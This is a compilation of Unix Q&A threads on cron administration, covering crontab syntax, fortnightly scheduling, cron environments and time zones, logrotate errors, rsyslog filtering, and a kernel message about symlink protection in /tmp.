Bonus when it works in an ssh session, in the GUI and on one or more of the following OS's too: HP-UX, Solaris and AIX
|
Run crontab -e and add an entry with
* * * * * export -p > ~/cron-env
(if on Solaris or a system that doesn't use a POSIX shell to interpret that command line, use /usr/xpg4/bin/sh -c 'export -p > ~/cron-env' or whatever the path to the standard sh is on that system).
Wait one minute and remove that line.
You should now have a cron-env file in your home directory.
You can then run:
cd && env -i sh -c '. ./cron-env; exec sh'
To start a shell with the same environment as your cron job got.
| Interactive shell with environment identical to cron |
1,324,046,017,000 |
As I know crontab has those fields, starting by left to right.
1 minutes 0-59
2 hours 0-23
3 days of month 1-31
4 month 1-12
5 day of the week 0-6
6 command
I want to run foo command every 15 days at 15:30
This is correct because it runs the command on the 1st and 15th of the month;
a month has 30 days (31 for some), so it runs every 15 days:
30 15 1,15 * * /sbin/foo -a 1> /dev/null
Is this syntax also correct?
30 15 */15 * * /sbin/foo -a 1> /dev/null
System is Slackware Linux which use Dillon Cron
|
The syntax 30 15 */15 * * is correct, but it does not do the same thing as 30 15 1,15 * *.
The latter will execute command at 1st and 15th of the month, as it has fixed comma separated values for the "day of month" field.
The / defines steps; that means */15 will execute every 15 days, starting from 1: on the 1st and 16th (of every month), and also on the 31st (of any month having 31 days).
As man crontab(5) says, step values can be used in conjunction with ranges. So if you want to get the same result using the / syntax, you could write: 30 15 1-15/14 * *, which is equivalent to 30 15 1,15 * *.
Another example, if you want to run every 15 days, but on 5th and 20th of every month: 5-20/15. Of course, for this case, it is more readable to write 5,20. But combining the range with the steps, enables defining the start-end of the ranged execution.
For Day 1,3,5,7 etc of the Month: */2
For Day 2,4,6,8 etc of the Month: 2-30/2
For Minutes(0-59) and Hours(0-23), the first valid value is 0 so this: 0 */2 * * * means at 00:00, 02:00, 04:00 etc.
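These expansions can be verified with a short sketch (the `expand` helper is ours; it models the start-at-range-begin stepping described above):

```python
# Sketch: expand a cron "start-end/step" range the way vixie-cron does,
# i.e. stepping from the first value of the range.
def expand(start, end, step=1):
    return list(range(start, end + 1, step))

print(expand(1, 31, 15))     # */15 in day-of-month -> [1, 16, 31]
print(expand(1, 15, 14))     # 1-15/14              -> [1, 15]
print(expand(0, 23, 2)[:3])  # */2 in hours         -> [0, 2, 4]
```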
| Should I use 1,15 or */15 in crontab to run a command every 15 days? |
1,324,046,017,000 |
I'm building on top of a Postgres Docker container which has cron implemented on top of Debian Jessie:
For debugging I want to look at the logs which I'm expecting to be at /var/log/syslog, but I don't have syslog on the system.
Would I need to turn on logging manually with a Debian Jessie Docker container?
|
You need to install rsyslog inside the container. You could do this in dockerfile.
Example of simplest dockerfile:
FROM debian:latest
RUN apt-get update && apt-get install -q -y rsyslog
CMD ["sh", "-c", "service rsyslog start ; tail -f /dev/null"]
| Docker Debian Jessie: Can't find /var/log/syslog |
1,324,046,017,000 |
The following appears in /var/log/messages. What does it mean?
Feb 19 22:51:20 kernel: [ 187.819487] non-matching-uid symlink following attempted in sticky world-writable directory by sh (fsuid 1001 != 0)
It happens when a cron job was about to run.
|
A privileged process can be tricked into overwriting an important file (/etc/passwd, /etc/shadow, etc.) by pointing a symlink at it. For example, if you know that root will run a program that creates a file in /tmp, you can lay a trap by guessing what the file name will be (typically /tmp/fooXXX, with foo being the program name and XXX being the process ID) and fill /tmp with likely candidates pointing at /etc/shadow. Later, root opens the file in /tmp, truncates and overwrites /etc/shadow and suddenly no one can log into the system anymore. There is a related attack that exploits a race condition between checking for the existence of a temp file and the creation of the file.
There are ways to avoid this problem, including careful use of mktemp() and mkstemp(), but not all programmers and users will be aware of this risk. As a result, a Linux kernel patch was proposed recently and apparently it has been applied to the kernel that you're using. The patch prevents following symlinks in one of the common situations where the malicious link might have been planted: a world-writable directory with the sticky bit set, which is the way /tmp is normally configured on Unix systems. Instead of following the symlink, the attempted system call fails with EACCES and the kernel logs the message that you saw.
Some related chatter on the Linux kernel mailing list.
| What does the following kernel message mean? |
1,324,046,017,000 |
Why does cron require MTA for logging? Is there any particular advantage to this? Why can't it create a log file like most other utilities?
|
Consider that the traditional "standard" way of logging data is syslog, where the metadata included in the messages are the "facility code" and the priority level. The facility code can be used to separate log streams from different services so that they can be split into different log files, etc. (even though the facility codes are somewhat limited in that they have fixed traditional meanings.)
What syslog doesn't have, is a way to separate messages for or from different users, and that's something that cron needs on a traditional multi-user system. It's no use collecting the messages from all users' cron jobs to a common log file where only the system administrator can see them. On the other hand, email naturally provides for sending messages to different users, so it's a logical choice here. The alternative would be for cron to do the work manually, and to create logfiles to each users' home directory, but a traditional multi-user Unix system would be assumed to have a working MTA, so implementing it in cron would have been mostly a futile exercise.
On modern systems, there might be alternative choices, of course.
| Why does cron require MTA for logging? |
1,324,046,017,000 |
I have an rsync cron job which is pushing the server load and triggering monitor alerts. If I set the job to be run with a high nice level, would that effectively reduce the impact it has on system load values?
|
It will not reduce your load.
It will only let other processes use CPU time more often if there is a possible resource contention (several processes "competing" for not enough available CPU time).
| Is setting a higher nice level for a process an effective way to reduce its impact on system load/CPU time? |
1,324,046,017,000 |
I need to calculate the time remaining until the next run of a specific job in my cron schedule. I have a cron with jobs at frequencies of once per hour, three times a day, etc. No jobs run on specific days/dates, so only HH:MM:SS is of concern. Also, I do not have the right to check /var/spool/cron/ on my RHEL system.
If some job starts at 9:30,
30 9 * * * /some/job.sh
-bash-3.2$ date +"%H:%M"
13:52
I'd need the output as: 19 Hours and 38 Minutes. How can I know the total time until the next run occurs, counted from the current system time? The calculation of seconds is concerned only with the job's time.
|
cron doesn't know when a job is going to fire. All it does is every minute, go over all the crontab entries and fire those that match "$(date '+%M %H %d %m %w')".
What you could do is generate all those timestamps for every minute from now to 49 hours from now (account for DST change), do the matching by hand (the tricky part) and report the first matching one.
Or you could use the croniter python module:
python -c '
from croniter import croniter
from datetime import datetime
iter = croniter("3 9 * * *", datetime.now())
print(iter.get_next(datetime))'
For the delay:
$ faketime 13:52:00 python -c '
from croniter import croniter
from datetime import datetime
d = datetime.now()
iter = croniter("30 9 * * *", d)
print(iter.get_next(datetime) - d)'
19:37:59.413956
Beware of potential bugs around DST changes though:
$ faketime '2015-03-28 01:01:00' python -c '
from croniter import croniter
from datetime import datetime
iter = croniter("1 1 * * *", datetime.now())
print(iter.get_next(datetime))'
2015-03-29 02:01:00
$ FAKETIME_FMT=%s faketime -f 1445734799 date
Sun 25 Oct 01:59:59 BST 2015
$ FAKETIME_FMT=%s faketime -f 1445734799 python -c '
from croniter import croniter
from datetime import datetime
iter = croniter("1 1 * * *", datetime.now())
print(iter.get_next(datetime))'
2015-10-25 01:01:00
$ FAKETIME_FMT=%s faketime -f 1445734799 python -c '
from croniter import croniter
from datetime import datetime
d = datetime.now()
iter = croniter("1 1 * * *", d)
print(iter.get_next(datetime) - d)'
-1 day, 23:01:01
cron itself takes care of that by avoiding running the job twice if the time has gone backward, and by running skipped jobs after the shift if the time has gone forward.
| Time remaining for the next run |
1,324,046,017,000 |
I'm running Ubuntu 14.04 LTS and nginx on a Digital Ocean VPS and occasionally receive these emails about a failed cron job:
Subject
Cron test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
The body of the email is:
/etc/cron.daily/logrotate:
error: error running shared postrotate script for '/var/log/nginx/*.log '
run-parts: /etc/cron.daily/logrotate exited with return code 1
Any thoughts on how I can resolve this?
Update:
/var/log/nginx/*.log {
weekly
missingok
rotate 52
compress
delaycompress
notifempty
create 0640 www-data adm
sharedscripts
prerotate
if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
run-parts /etc/logrotate.d/httpd-prerotate; \
fi
endscript
postrotate
invoke-rc.d nginx rotate >/dev/null 2>&1
endscript
}
Update:
$ sudo invoke-rc.d nginx rotate
initctl: invalid command: rotate
Try `initctl --help' for more information.
|
The post rotate action appears to be incorrect
Try
invoke-rc.d nginx reload >/dev/null 2>&1
If you look at the nginx command you will see the actions it will accept. Also the message you got says check initctl --help
xtian@fujiu1404:~/tmp$ initctl help
Job commands:
start Start job.
stop Stop job.
restart Restart job.
reload Send HUP signal to job.
status Query status of job.
list List known jobs.
so reload should work and send HUP signal to nginx to force reopen of logfiles.
| nginx logrotate error on cron job |
1,324,046,017,000 |
Background: I am working on CentOS
Details
# cat /proc/version
Linux version 2.6.18-308.4.1.el5PAE ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-52)) #1 SMP Tue Apr 17 17:47:38 EDT 2012
Question: How can i know which version cron daemon installed and running on machine
|
The dummy way:
whereis -b crontab | cut -d' ' -f2 | xargs rpm -qf
| How to get which version of cron daemon is running |
1,324,046,017,000 |
Is there a way to schedule a cron job to run every fortnight?
(One way I can think of, within crontab, would be to add two entries for "date-of-month"...)
|
No, cron only knows about the day of the week, the day of the month and the month.
Running a command twice a month on fixed days (e.g. the 1st and the 16th) is easy:
42 4 1,16 * * do_stuff
Running a command every other week is another matter. The best you can do is to run a command every week, and make it do nothing every other week. On Linux, you can divide the number of seconds since the epoch (date +%s) by the number of seconds in a week to get a number that flips parity every week. Note that in a crontab, % needs to be escaped (cron turns % into newlines before executing the command).
42 4 * * 1 case $(($(date +\%s) / (60*60*24*7))) in *[02468]) do_stuff;; esac
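Outside of cron, the same parity test can be run by hand to check which kind of week it currently is:

```shell
# Weeks elapsed since the epoch; the last decimal digit is even on
# "even" weeks, which is what the crontab's case pattern tests.
week=$(( $(date +%s) / (60*60*24*7) ))
case $week in
  *[02468]) echo "even week: do_stuff would run" ;;
  *)        echo "odd week: skipped" ;;
esac
```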
| Is it possible to schedule a cron job to run fortnightly? |
1,324,046,017,000 |
I use a cron job to call offlineimap every 2 minutes:
*/2 * * * * /usr/bin/offlineimap > ~/Maildir/offlineimap.log 2>&1
I needed to kill the cron job to fix a problem. How can I then restart the cron job (without rebooting)? I found this 'solution' online:
mylogin@myhost:~$ sudo /etc/init.d/cron restart
Rather than invoking init scripts through /etc/init.d, use the service(8)
utility, e.g. service cron restart
Since the script you are attempting to invoke has been converted to an
Upstart job, you may also use the stop(8) and then start(8) utilities,
e.g. stop cron ; start cron. The restart(8) utility is also available.
cron stop/waiting
cron start/running, process 26958
However, using ps -ef | grep ..., I don't see the job... What's wrong?
|
Cron approach
If you have sudo privileges you could stop/start the cron service. I believe that's what that solution you found online was explaining.
Depending on which Linux distro you're using you could either do these commands:
# redhat distros
$ sudo /etc/init.d/crond stop
... do your work ...
$ sudo /etc/init.d/crond start
Or do these commands:
# Debian/Ubuntu distros
$ sudo service cron stop
... do your work ...
$ sudo service cron start
Lock file type approach
You could also put a "dontrunofflineimap" file in say the /tmp directory when you want the offlineimap task to hold off and not run for a bit.
The process would work like this. You touch a file in /tmp like so:
touch /tmp/dontrunofflineimap
The cron job would be modified like so:
*/2 * * * * [ -f /tmp/dontrunofflineimap ] || /usr/bin/offlineimap > ~/Maildir/offlineimap.log 2>&1
While that file exists, it will essentially block the offlineimap app from running. When you want it to resume, simply delete the /tmp/dontrunofflineimap file.
| How to start a cron job without reboot? |
1,324,046,017,000 |
I have a cron job which executes every day at 9:00 AM UTC. I'm in GMT+1, so it executes at 10:00 AM local time. When the timezone changes (to daylight saving time, DST), the cron job still executes at 9:00 AM UTC, but at 11:00 AM local time. However, I want it to always execute at 10:00 local time, whether it is summer time or not. How do I do that?
|
Check your setting in /etc/timezone. In the question you mentioned you are in "GMT+1", if that is what your timezone is set to, your script will always execute at UTC plus one hour. If you set it to e.g. "Europe/Paris", the time of execution will change with the daylight savings time.
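If you cannot change the system timezone, some cron implementations (e.g. cronie, as shipped on Fedora/RHEL) also honor a CRON_TZ variable in the crontab; treat this as implementation-specific and check your cron's man page first. A sketch (the job path is illustrative):

```
CRON_TZ=Europe/Berlin
0 10 * * * /path/to/job
```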
| Change the time zone of a cronjob |
1,324,046,017,000 |
I have set up emacs as my default editor in /etc/profile. When I want to use emacs in a terminal, I open it with the -nw option. How can I have the same behavior when doing crontab -e, preventing it from opening in a window?
|
You have to use
export EDITOR="emacs -nw"
with the quotes, and it should work as expected.
| Open emacs in a terminal when editing crontab |
1,324,046,017,000 |
In my /etc/rsyslog.conf, I have the following line to log the auth facility into /var/log/auth.log:
auth,authpriv.* /var/log/auth.log
but the file is flooded with cron logs, such as these:
CRON[18620]: pam_unix(cron:session): session opened for user root by (uid=0)
CRON[18620]: pam_unix(cron:session): session closed for user root
I would like to get rid of the cron logs, and only have real "auth" events being logged into that file. By that I mean, I want to see which users have logged into the system, or made su -.
How can I achieve that?
|
I believe this is what you are looking for:
:msg, contains, "pam_unix(cron:session)" ~
auth,authpriv.* /var/log/auth.log
The first line matches cron auth events and deletes them. The second line then logs as per your rule, minus the previously deleted lines.
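Note that on newer rsyslog versions (v7 and later) the `~` discard action is deprecated in favor of `stop`; the equivalent rules would be:

```
:msg, contains, "pam_unix(cron:session)" stop
auth,authpriv.*    /var/log/auth.log
```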
| don't log cron events in auth.log |